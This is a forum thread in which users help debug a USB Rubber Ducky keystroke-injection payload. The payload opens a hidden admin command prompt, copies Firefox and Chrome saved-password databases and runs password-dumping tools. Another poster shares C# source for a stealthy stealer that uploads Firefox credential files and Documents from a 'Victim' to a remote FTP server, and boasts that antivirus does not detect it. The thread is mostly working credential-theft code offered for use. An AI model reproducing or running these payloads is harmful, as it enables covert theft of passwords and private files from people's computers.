h4x0r666 Posted February 28, 2013 (edited)

What is wrong with this? I just got my Rubber Ducky but it's not doing what I want.. it just opens some random things and types the rest of the code there.. I made the inject.bin with http://www.iducke.com/Encoder/ because I have no Linux beside me at the moment -.-"

This is the payload:

REM ######################################################################################################
REM # Author: H4x0r666 #
REM # OS Designed and Tested on: Windows Vista Home Basic #
REM # #
REM # This script was developed and intended to: #
REM # #
REM # 1.) Copy the Firefox key3.db & signons.sqlite (as passwords backup) #
REM # 2.) Copy the Google Chrome Login Data (as passwords backup) #
REM # 3.) Starts iepv.exe to copy the Internet Explorer passwords #
REM # 4.) Starts OperaPassView.exe to copy the Opera passwords #
REM # 5.) Starts mailpv.exe to copy the mail passwords #
REM # 6.) Starts BulletsPassView.exe to copy the passwords behind bullets (the hidden passwords..) #
REM # 7.) Starts netpass.exe to copy the net passwords #
REM # 8.) Starts WirelessKeyView.exe to copy the wireless keys #
REM # #
REM # All through cmd commands.. #
REM ######################################################################################################
DELAY 500
GUI d
DELAY 500
CONTROL ESCAPE
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
LEFT
ENTER
DELAY 750
ALT SPACE
STRING m
DOWNARROW
REPEAT 100
ENTER
DELAY 25
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d
DELAY 100
STRING cd %AppData%\Mozilla\Firefox\Profiles
ENTER
STRING cd
SPACE
TAB
ENTER
STRING COPY key3.db %homepath%\Contacts
ENTER
STRING COPY signons.sqlite %homepath%\Contacts
ENTER
STRING MOVE /Y %homepath%\Contacts\key3.db %myd%
ENTER
STRING MOVE /Y %homepath%\Contacts\signons.sqlite %myd%
ENTER
DELAY 100
STRING cd %LocalAppData%\Google\Chrome\User Data\Default
ENTER
STRING COPY "Login Data"
SPACE
STRING %homepath%\Contacts
ENTER
STRING MOVE /Y "%homepath%\Contacts\Login Data"
SPACE
STRING %myd%
ENTER
DELAY 200
STRING %myd%\Programs\iepv.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING ie_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\OperaPassView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING opera_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\mailpv.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING mail_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\BulletsPassView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING bb_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\netpass.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING net_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\WirelessKeyView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING wireless_keys.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING exit
ENTER

EDITED AGAIN..... Please see my last post^^

Edited February 28, 2013 by h4x0r666 (added spoiler tag)
sober Posted February 28, 2013

Try a 5000 ms delay at the beginning. Also, STRING COPY key3.db %homepath%\Contacts needs a file name specified on copies, for starters.
h4x0r666 Posted February 28, 2013 (Author)

I need it to start cmd as administrator.. and I have a question also^^ What happens if an AV detects a malicious file? Because the last program somehow got a false warning detected, but I ignored it with my AV, so I don't know what would happen if everything worked but it still got detected? I am not going to crypt it :P too much work^^

But I can't make the inject.bin if I use CTRL-SHIFT ESC :( it gives me an error, so I have to find another way to open cmd as admin.. (I changed the first line because it doesn't need to start with GUI r but just with GUI, I guess? (the start menu..) Same as CTRL-SHIFT ESC?) Please, someone help fixing it..
no42 Posted February 28, 2013 (edited)

I thought:
CTRL-SHIFT ESC - Start Task Manager
CTRL-SHIFT ENTER - Run as Admin

Also,
for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
only needs to be done once; then you can use the following below (less to type):
%myd%/whatever.exe

Edited February 28, 2013 by midnitesnake
h4x0r666 Posted February 28, 2013 (Author, edited)

Yeah, I meant CONTROL ESCAPE instead of CTRL+SHIFT+ESC.. but http://www.iducke.com/Encoder/ gives the following error..

CTRL-SHIFT ENTER is an unrecognized command

EDIT: This works though..

GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER

But I need it to start as admin, and that's not the case with that code, because when I start cmd through CONTROL ESCAPE > CMD > CTRL-SHIFT ENTER (manually) it can start any program directly as admin without asking again, but with the above code it may look like it started as admin but it's not, because if you try to start a program it will still ask to accept or cancel..

Edited February 28, 2013 by h4x0r666
no42 Posted February 28, 2013

http://www.iducke.com/Encoder/ uses Encoder v1. Things like CTRL-SHIFT X were introduced in Encoder v2+. I suggest you download the updated Encoder from ducky-decode and use that instead of the now outdated IDE.
overwraith Posted February 28, 2013

Replace CTRL-SHIFT ENTER with: CTRL SHIFT ENTER
h4x0r666 Posted February 28, 2013 (Author)

I edited the whole payload again.. I am trying all kinds of stuff but it just doesn't do what I want it to do, please someone help me^^ I used the encoder 2.3, so yes, it made the inject.bin successfully, but there must be something with the script..

STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d

That above line only works when I have the SD card in my reader, but not in the ducky (and yes, it's called h4x0r666), but that can't be the problem. And is there something with the REPEAT 100, because it's not going down.. Someone please try and test it and, if possible, give me the inject.bin & modified payload. Manually almost everything does as I want.. but the ducky doesn't^^
overwraith Posted February 28, 2013 (edited)

Unfortunately it takes time to mount the SD card before the executables on it can be accessed. The script probably tried accessing them before the drive had been mounted. Take a look at the payload "Run EXE from SD" on the wiki. Posting here also. The payload waits for the SD to mount.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER

I seem to remember that one of the firmware versions had a feature where pressing the button would replay the script. This would be another solution to the problem. Yet another solution would be to make the ducky execute when using one of the keyboard modifiers like Num Lock or Scroll Lock.

Edited February 28, 2013 by overwraith
overwraith Posted February 28, 2013

You probably should also remove the ALT + F4 from the script, because the command prompt doesn't close when you use ALT + F4.
Dnucna Posted February 28, 2013

Hmm, I'm not sure I have programmed the ^ character, because in French it's a dead key (^ then space), so I haven't tested this case. Do you get an error or warning message during the encoding?

Dnu
h4x0r666 Posted February 28, 2013 (Author)

No problem, encoding goes smoothly, and the ALT F4 is to close the extra windows from iepv.exe, operapassview.exe, mailpv.exe, etc. And yes, I have looked over that script, but how long does it need to take to see my SD card? It sees my ducky directly.. so since it also executes the inject.bin (from the SD card), why doesn't it see the SD card with the command? And why isn't the (hide window) working? I used the snippets from the official payloads...
overwraith Posted February 28, 2013

I am not entirely sure why the down arrows are not working. The hide window script worked fine a month or so ago. I am thinking something either in the encoder or on the system changed. It is not even working on my computer now. Whatever is going on, I am very cross.
overwraith Posted February 28, 2013

Could the firmware upgrade be causing the down arrow and repeat commands not to work?
overwraith Posted February 28, 2013

I got a quick fix. Replace the REPEAT 100 with 100 DOWNARROWs. For some reason the REPEAT command doesn't work correctly.
ApacheTech Consultancy Posted February 28, 2013

I've done this an easier way, I think. I've made a small, stealthy C#.NET file which uploads files to my FTP server. It's programmed with lots of try...catch blocks that simply gracefully degrade the program if it comes across any errors at all. I call it Firefox Extinguisher. There are currently four flavours of the program:

FFE: Mission Critical - Uploads key3.db, signons.sqlite and cert8.db of all profiles (scans profiles.ini for non-standard installations).
FFE: Sidejacker - The same as above, but includes cookies.sqlite, places.sqlite and any bookmark backups.
FFE: Clone Wars - Uploads the entirety of any Firefox profile path found.
FFE: DEFCON1 - Uploads all Firefox profiles, My Pictures, My Documents and acts as a daemon watching for changes in any Sidejacker files, reuploads any updated files and persists through reboot. The memory footprint is only about 120KB on idle.

All versions come with LockSafing, allowing files to be uploaded even if they are currently in use (i.e. if Firefox is open and in use).

I know it's slightly on a tangent to the thread, but if you do have any background in programming, or fancy playing around with .NET, it's a relatively simple app to write and a lot easier to run with the duck, using the wget and execute script.
no42 Posted February 28, 2013

The REPEAT command is not supported in the duck encoder.jar (only the IDE, which is v1 and now outdated). Down arrow is based off the basic HID mapping keyboard.properties, or corrected by your individual country-code.properties file; if this is incorrect, please inform us of the patch. The firmware just echoes commands from the encoder; you could try "DOWN" rather than "DOWNARROW".
h4x0r666 Posted March 1, 2013 (Author, edited)

I don't think it does the down key at all. Look at this screenshot I just made.. (just before it quit) Yess.. Sorry if you don't understand everything, I'm Dutch, but you can guess the output.. And yes, ApacheTech Consultancy, I'm interested if you could show us some example payload with your nice file :D

And..

for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d

I just waited and tried it some more while the ducky did its thing (screenshot..) but it can't find the SD card.. I wonder how it executes the inject.bin if the SD directory isn't detected o.0 Well, it's my first day of using my ducky, but anyway.. feels bad that it failed.

Edited March 1, 2013 by h4x0r666
ApacheTech Consultancy Posted March 1, 2013

The FTP Wrapper class I'm using is here: http://netftp.codeplex.com/releases/view/95632

The main bulk of the program is written using Extension Methods. These are the main ones. Please excuse the lack of annotation.

using System;
using System.IO;
using System.Windows.Forms;
using Ftp = System.Net.FtpClient;

namespace ffe
{
    public static class ExtensionsMethods
    {
        public static Ftp.FtpClient ftp = new Ftp.FtpClient()
        {
            Host = "REDACTED",
            Credentials = new System.Net.NetworkCredential("REDACTED", "REDACTED"),
            DataConnectionType = Ftp.FtpDataConnectionType.PASVEX,
        };

        public static string baseDir = String.Format(@"{0}/{1}", Environment.MachineName, Environment.UserName);

        public static string ToFtpPath(this String s, string basePath, string section)
        {
            return String.Format(@"{0}/{1}/{2}", baseDir, section, s.Substring(basePath.Length).Replace(@"\", @"/"));
        }

        public static bool ExistsOnServer(this FileInfo f, string section, string basePath)
        {
            try
            {
                ftp.Connect();
                if (ftp.FileExists(f.FullName.ToFtpPath(basePath, section)))
                {
                    return true;
                }
                else
                {
                    return false;
                }
            }
            catch (Exception)
            {
                Application.Exit();
                return false;
            }
            finally
            {
                ftp.Disconnect();
            }
        }

        public static void Upload(this FileInfo f, string section, string basePath)
        {
            FileInfo ls;
            {
                try { ls = f.LockSafe(); }
                catch (Exception) { return; }
            }
            if (ls.Length == 0) return;
            byte[] b = File.ReadAllBytes(ls.FullName);
            string rPath = f.FullName.ToFtpPath(basePath, section);
            string rDir = rPath.Substring(0, rPath.LastIndexOf("/"));
            try
            {
                ftp.SetDataType(Ftp.FtpDataType.Binary);
                {
                    try { ftp.Connect(); }
                    catch (Exception) { return; }
                }
                if (!ftp.DirectoryExists(rDir))
                {
                    ftp.CreateDirectory(rDir);
                }
                using (Stream o = ftp.OpenWrite(f.FullName.ToFtpPath(basePath, section)))
                {
                    Console.Write(f.FullName.ToFtpPath(basePath, section) + " ..... ");
                    try
                    {
                        while (o.Position <= b.Length)
                        {
                            o.Write(b, 0, b.Length);
                        }
                        Console.WriteLine("[ OK ]");
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine("[ FAILED ]");
                        Console.WriteLine("Error:" + ex.Message);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error:" + ex.Message);
            }
            finally
            {
                f.CleanLockSafe();
                ftp.Disconnect();
            }
        }

        public static FileInfo LockSafe(this FileInfo file)
        {
            // Create a file stream.
            FileStream stream = null;
            try
            {
                // Try to open the file.
                stream = file.Open(FileMode.Open, FileAccess.ReadWrite, FileShare.None);
            }
            catch (IOException)
            {
                // The file is unavailable because it is:
                // Still being written to or is being processed by another thread.
                file.CleanLockSafe();
                File.Copy(file.FullName, file.FullName + ".ffe");
                return new FileInfo(file.FullName + ".ffe");
            }
            finally
            {
                if (stream != null) stream.Close();
            }
            // File is not locked
            return file;
        }

        public static void CleanLockSafe(this FileInfo f)
        {
            if (File.Exists(f.FullName + ".ffe"))
            {
                File.Delete(f.FullName + ".ffe");
            }
        }
    }
}

Then, just a very simple controller class for the victim.

using System;
using System.Collections.Generic;
using System.Linq;
using System.IO;
using System.Net;

namespace ffe
{
    public static class Victim
    {
        public static bool IsOnline
        {
            get
            {
                try
                {
                    using (var client = new WebClient())
                    using (var stream = client.OpenRead("http://www.google.com"))
                    {
                        return true;
                    }
                }
                catch
                {
                    return false;
                }
            }
        }

        public static string Documents
        {
            get { return Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + @"\"; }
        }

        public static string Pictures
        {
            get { return Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\"; }
        }

        public static string AppData
        {
            get { return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\"; }
        }

        public static string FirefoxProfiles
        {
            get { return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\Mozilla\Firefox\"; }
        }

        public static string ProgramFiles
        {
            get { return Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + @"\"; }
        }

        public static string Downloads
        {
            get { return Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + @"\Downloads"; }
        }
    }
}

And finally, the file lists themselves:

using System.Collections.Generic;
using System.IO;
using System.Linq;

namespace ffe
{
    public static class FFE
    {
        public static List<FileInfo> MissionCriticalFileList
        {
            get
            {
                // Gather a list of files.
                List<FileInfo> tmpList = new List<FileInfo>();
                string[] dirs = Directory.GetDirectories(Victim.FirefoxProfiles, "*", SearchOption.TopDirectoryOnly);
                foreach (string dir in dirs)
                {
                    if (!dir.EndsWith("history"))
                    {
                        Directory.EnumerateFiles(Victim.FirefoxProfiles, "*", SearchOption.AllDirectories)
                            .Where((p) => p.EndsWith("signons.sqlite") || p.EndsWith("key3.db") || p.EndsWith("cert8.db"))
                            .ToList<string>()
                            .ForEach((p) => tmpList.Add(new FileInfo(p)));
                    }
                }
                return tmpList;
            }
        }

        public static List<FileInfo> FullProfilesList
        {
            get
            {
                // Gather a list of files.
                List<FileInfo> tmpList = new List<FileInfo>();
                string[] dirs = Directory.GetDirectories(Victim.FirefoxProfiles, "*", SearchOption.TopDirectoryOnly);
                foreach (string dir in dirs)
                {
                    Directory.EnumerateFiles(Victim.FirefoxProfiles, "*", SearchOption.AllDirectories)
                        .Where((p) => (!p.Contains("minidumps")))
                        .ToList<string>()
                        .ForEach((p) => tmpList.Add(new FileInfo(p)));
                }
                return tmpList;
            }
        }

        public static List<FileInfo> Documents
        {
            get
            {
                List<FileInfo> tmpList = new List<FileInfo>();
                // Gather a list of the topmost directories.
                string[] dirs = Directory.GetDirectories(Victim.Documents, "*", SearchOption.TopDirectoryOnly);
                // Cycle through each top layer directory.
                foreach (string dir in dirs)
                {
                    // If the folder is write-protected, skip it.
                    if (!dir.EndsWith("My Music") & !dir.EndsWith("My Pictures") & !dir.EndsWith("My Videos"))
                    {
                        // Add all files in all readable subdirectories to a list.
                        Directory.GetFiles(dir, "*.*", SearchOption.AllDirectories)
                            .ToList<string>()
                            .ForEach((p) => tmpList.Add(new FileInfo(p)));
                    }
                }
                return tmpList;
            }
        }
    }
}

Once you have all that, it's relatively self-explanatory what goes where.

FFE.FullProfilesList.ForEach((p) => p.Upload("Firefox", Victim.FirefoxProfiles));

It's fully undetected on all of the online AV scraper sites I've tried.
h4x0r666 Posted March 1, 2013 (Author)

Nice haha, but anyway, I got the DOWN thing working.. by replacing:

ALT SPACE
STRING m
DOWNARROW
REPEAT 100
ENTER

With:

ALT SPACE
DOWNARROW
ENTER
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER

(But then 100 times the DOWNARROW, because I guess... the REPEAT function isn't even working?)

But do I need something extra to be able to run files from the SD card while it's being mounted by the ducky? o.0 Please explain :D
no42 Posted March 1, 2013

"But do I need something extra to be able to run files from the SD card while it's being mounted by the ducky? o.0 Please explain :D"

You need the TwinDuck firmware. What firmware are you running at the moment?
no42 Posted March 1, 2013

Just implemented the REPEAT command in Encoder v2.4. If you could, please participate in testing and post feedback here.

Thanks,
Snake
h4x0r666 Posted March 1, 2013 (Author)

The encoding process in 2.3 is done in less than a second, while in 2.4 it either takes very, very long.. or it just doesn't work, but I quit after waiting a couple of minutes. Is it working for you correctly, just like in 2.3? (I have Windows Home Basic, if the OS is the problem, which it wasn't on 2.3.) And I have no idea what firmware I have at the moment.. since I just got my ducky, I guess the default firmware it should have? What is the difference with the TwinDuck firmware? What do you recommend me.. ^_^
ApacheTech Consultancy Posted March 1, 2013

The TwinDuck firmware allows you to use the Duck as a Mass Storage Device as well as a HID. There is a step by step guide to flashing your duck with the new firmware in the Stickies on the forum.

Which duck are you using currently, i.e. what colour is the board? This will give us an indication of which stock firmware you are currently using. It is possible that commands which have either been added or deprecated are causing errors with your compiler. If you use the TwinDuck firmware, make sure you use the latest versions of the compiler and make sure your Java files are up to date (or at least Java 1.7.0). This will give you the best chance of completion.
h4x0r666 Posted March 2, 2013 (Author)

I got the latest (green) board. I hope I don't fuck my ducky up xD Would be awesome if someone could help tomorrow through TeamViewer or something.. (for less chance of failing) >.<"